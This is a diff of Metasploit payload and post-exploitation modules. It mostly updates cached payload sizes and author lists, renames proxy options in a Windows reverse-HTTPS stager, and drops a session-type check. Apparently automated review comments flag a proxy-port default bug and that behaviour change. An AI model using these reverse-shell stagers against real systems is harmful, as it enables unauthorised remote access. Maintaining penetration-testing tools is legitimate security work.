 'Platform' => 'linux',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
index 3e9f8ab1d6..6745bb5f9b 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 729184
+ CachedSize = 746944
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
index e52a985f0c..0cc26899f3 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 729184
+ CachedSize = 746944
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 3d44d1abe8..c7da73f173 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 772828
+ CachedSize = 794800
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index 8d2f70e310..ac313d906c 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 772828
+ CachedSize = 794800
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index 55bdf50aa5..d72061e2cc 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 772828
+ CachedSize = 794800
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_X86,
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
index d5adac9574..a129f3834a 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 893560
+ CachedSize = 907360
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ZARCH,
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
index 0e8fe66ace..9372c91415 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 893560
+ CachedSize = 907360
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ZARCH,
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
index abb089db49..6e099ef231 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 893560
+ CachedSize = 907360
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'linux',
 'Arch' => ARCH_ZARCH,
diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
index 6cd4278eb5..dffa4838b1 100644
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
 module MetasploitModule
- CachedSize = 805
+ CachedSize = 803
 include Msf::Payload::Single
 include Msf::Payload::NodeJS
diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
index d2fa02fa4b..29cbe3588d 100644
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 module MetasploitModule
- CachedSize = 833
+ CachedSize = 831
 include Msf::Payload::Single
 include Msf::Payload::NodeJS
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
index 4a08503586..f1b9a907df 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 618412
+ CachedSize = 793284
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
index 6436a8b549..264643fb7d 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 618412
+ CachedSize = 793284
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
index a70eb46ee7..a4d7677fd4 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 618412
+ CachedSize = 793284
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
@@ -24,7 +24,8 @@ module MetasploitModule
 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
 'Author' => [
 'Adam Cammack ',
- 'Brent Cook '
+ 'Brent Cook ',
+ 'timwr'
 ],
 'Platform' => 'osx',
 'Arch' => ARCH_X64,
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index 3d097c72a7..f5e7303a36 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 56570
+ CachedSize = 57798
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index 354fd0852e..f016ee0023 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 56530
+ CachedSize = 57762
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index dbf19dc526..d13916ecb6 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 56534
+ CachedSize = 57762
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index f63420ede9..721b61e0de 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 56486
+ CachedSize = 57714
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
index 4aa49bfccd..79e23e6a0c 100644
--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 179267
+ CachedSize = 179779
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
index 12cb6341e7..2bcca8d51c 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 180311
+ CachedSize = 180825
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
index 539bfd288f..2f470a05b9 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 180311
+ CachedSize = 180825
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
index 23d9de6df9..dce4c880d4 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 179267
+ CachedSize = 179779
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
index 256f5b6225..bacdd2591d 100644
--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 179267
+ CachedSize = 179779
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb
index 9b7413ffef..caf3a2f68d 100644
--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module MetasploitModule
- CachedSize = 1501
+ CachedSize = 1518
 include Msf::Payload::Windows::Exec
 include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
index f7a5dcab0c..beba1f83bc 100644
--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module MetasploitModule
- CachedSize = 1509
+ CachedSize = 1526
 include Msf::Payload::Windows::Exec
 include Msf::Payload::Windows::Powershell
diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
index 058078b353..86df5d345e 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 205379
+ CachedSize = 205891
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
index 0398f24b52..b88ce277d6 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 206423
+ CachedSize = 206937
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
index 5679a3a8be..f3fd8e639b 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 206423
+ CachedSize = 206937
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
index bb151559da..102840f525 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 205379
+ CachedSize = 205891
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
index 337ebe2c73..b38fe1f070 100644
--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -12,7 +12,7 @@ require 'rex/payloads/meterpreter/config'
 module MetasploitModule
- CachedSize = 205379
+ CachedSize = 205891
 include Msf::Payload::TransportConfig
 include Msf::Payload::Windows
diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
index 477f7c0961..face477a1b 100644
--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module MetasploitModule
- CachedSize = 1501
+ CachedSize = 1518
 include Msf::Payload::Windows::Exec_x64
 include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
index e3bdaee025..5713b440c1 100644
--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module MetasploitModule
- CachedSize = 1509
+ CachedSize = 1526
 include Msf::Payload::Windows::Exec_x64
 include Msf::Payload::Windows::Powershell
diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb
index 635afb61ca..70521e2055 100644
--- a/modules/payloads/stagers/java/bind_tcp.rb
+++ b/modules/payloads/stagers/java/bind_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/java/bind_tcp'
 module MetasploitModule
- CachedSize = 5118
+ CachedSize = 5303
 include Msf::Payload::Stager
 include Msf::Payload::Java
diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb
index 2d1498c7d5..8f011c61f2 100644
--- a/modules/payloads/stagers/java/reverse_http.rb
+++ b/modules/payloads/stagers/java/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_http'
 module MetasploitModule
- CachedSize = 5123
+ CachedSize = 5386
 include Msf::Payload::Stager
 include Msf::Payload::Java
diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb
index d276ea2d52..a58aa42357 100644
--- a/modules/payloads/stagers/java/reverse_https.rb
+++ b/modules/payloads/stagers/java/reverse_https.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/java/reverse_https'
 module MetasploitModule
- CachedSize = 5932
+ CachedSize = 6195
 include Msf::Payload::Stager
 include Msf::Payload::Java
diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb
index 5ad61693af..4f5110192a 100644
--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/java/reverse_tcp'
 module MetasploitModule
- CachedSize = 5118
+ CachedSize = 5303
 include Msf::Payload::Stager
 include Msf::Payload::Java
diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb
index 2b58ea764b..819f4848b9 100644
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_http'
 module MetasploitModule
- CachedSize = 339
+ CachedSize = 347
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb
index 907fa651de..31e6d29a13 100644
--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_https'
 module MetasploitModule
- CachedSize = 359
+ CachedSize = 367
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb
index 766c741332..f79ba8c95d 100644
--- a/modules/payloads/stagers/windows/reverse_https_proxy.rb
+++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https_proxy' module MetasploitModule - CachedSize = 397 + CachedSize = 384 include Msf::Payload::Stager include Msf::Payload::Windows @@ -80,8 +80,8 @@ module MetasploitModule p[i, u.length] = u # patch proxy info - proxyhost = datastore['PayloadProxyHost'].to_s - proxyport = datastore['PayloadProxyPort'].to_s || "8080" + proxyhost = datastore['HttpProxyHost'].to_s + proxyport = datastore['HttpProxyPort'].to_s || "8080" if Rex::Socket.is_ipv6?(proxyhost) proxyhost = "[#{proxyhost}]" @@ -91,7 +91,7 @@ module MetasploitModule if proxyport == "80" proxyinfo = proxyhost end - if datastore['PayloadProxyType'].to_s == 'HTTP' + if datastore['HttpProxyType'].to_s == 'HTTP' proxyinfo = 'http://' + proxyinfo else #socks proxyinfo = 'socks=' + proxyinfo 
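Review bot: On the new `proxyport` line, `datastore['HttpProxyPort'].to_s || "8080"` never falls back to the default: `to_s` turns nil into `""`, which is truthy, so an unset port is patched into the stager as `host:` with nothing after the colon. `proxyport = (datastore['HttpProxyPort'] || 8080).to_s` keeps the intended default; this was already wrong under the old key name but the rename is the moment to fix it. The same `PayloadProxy*` → `HttpProxy*` rename continues in the `@@ -105,22` hunk below; the options themselves are registered outside this diff, so the merger should confirm the handler now registers exactly `HttpProxyHost`, `HttpProxyPort`, `HttpProxyType`, `HttpProxyUser` and `HttpProxyPass`, otherwise every lookup here silently reads nil. The enclosing method's definition lies outside both hunks.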
@@ -105,22 +105,22 @@ module MetasploitModule p[proxyloc-4] = [calloffset].pack('V')[0] # Authentication credentials have not been specified - if datastore['PayloadProxyUser'].to_s == '' or - datastore['PayloadProxyPass'].to_s == '' or - datastore['PayloadProxyType'].to_s == 'SOCKS' + if datastore['HttpProxyUser'].to_s == '' || + datastore['HttpProxyPass'].to_s == '' || + datastore['HttpProxyType'].to_s == 'SOCKS' jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START") # Remove the authentication code p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "") else - username_size_diff = 14 - datastore['PayloadProxyUser'].to_s.length - password_size_diff = 14 - datastore['PayloadProxyPass'].to_s.length + username_size_diff = 14 - datastore['HttpProxyUser'].to_s.length + password_size_diff = 14 - datastore['HttpProxyPass'].to_s.length jmp_offset = 16 + # PROXY_AUTH_START length 15 + # PROXY_AUTH_STOP length - username_size_diff + # Difference between datastore PayloadProxyUser length and db "PayloadProxyUser length" - password_size_diff # Same with PayloadProxyPass + username_size_diff + # Difference between datastore HttpProxyUser length and db "HttpProxyUser length" + password_size_diff # Same with HttpProxyPass # Patch call offset username_loc = p.index("PROXY_USERNAME") @@ -131,8 +131,8 @@ module MetasploitModule # Remove markers & change login/password p = p.gsub("PROXY_AUTH_START","") p = p.gsub("PROXY_AUTH_STOP","") - p = p.gsub("PROXY_USERNAME", datastore['PayloadProxyUser'].to_s) - p = p.gsub("PROXY_PASSWORD", datastore['PayloadProxyPass'].to_s) + p = p.gsub("PROXY_USERNAME", datastore['HttpProxyUser'].to_s) + p = p.gsub("PROXY_PASSWORD", datastore['HttpProxyPass'].to_s) end # Patch jmp dbl_get_server_host diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index eb634588de..fd0d496261 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb 
+++ b/modules/payloads/stagers/windows/reverse_winhttp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttp'
 module MetasploitModule
- CachedSize = 357
+ CachedSize = 520
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb
index a7784e0c4c..07726c00c3 100644
--- a/modules/payloads/stagers/windows/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/reverse_winhttps.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/reverse_winhttps'
 module MetasploitModule
- CachedSize = 377
+ CachedSize = 542
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb
index 6a2686cc83..624fc33a65 100644
--- a/modules/payloads/stagers/windows/x64/reverse_http.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_http.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_http'
 module MetasploitModule
- CachedSize = 520
+ CachedSize = 529
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb
index d11003e5f5..7cee13664a 100644
--- a/modules/payloads/stagers/windows/x64/reverse_https.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_https.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_https'
 module MetasploitModule
- CachedSize = 551
+ CachedSize = 563
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
index 3ee66da58d..3571790029 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttp'
 module MetasploitModule
- CachedSize = 532
+ CachedSize = 746
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
index 0a70268db0..2ed98e3f61 100644
--- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/windows/x64/reverse_winhttps'
 module MetasploitModule
- CachedSize = 563
+ CachedSize = 782
 include Msf::Payload::Stager
 include Msf::Payload::Windows
diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb
index fd865392db..1a69f54bd7 100644
--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -52,11 +52,6 @@ class MetasploitModule < Msf::Post
 def run
 print_status("Upgrading session ID: #{datastore['SESSION']}")
- if session.type =~ /meterpreter/
- print_error("Shell is already Meterpreter.")
- return nil
- end
-
 # Try hard to find a valid LHOST value in order to
 # make running 'sessions -u' as robust as possible.
 if datastore['LHOST']
diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index e695f9a9ae..47001bae5e 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
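Review bot: Dropping the `session.type =~ /meterpreter/` guard in shell_to_meterpreter.rb's `run` is a behaviour change, not a tidy-up: a Meterpreter session now goes through the whole upgrade path instead of returning early, and nothing in the hunk says why that is now wanted. If the intent is to let one Meterpreter flavour be upgraded to another, a one-line comment where the check used to be, such as `# Meterpreter sessions are accepted so they can be re-upgraded to another payload flavour`, records that for the next reader; if it is not the intent, the guard should stay. `run` continues past the end of this hunk, so whether the later code copes with a Meterpreter session cannot be checked here.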
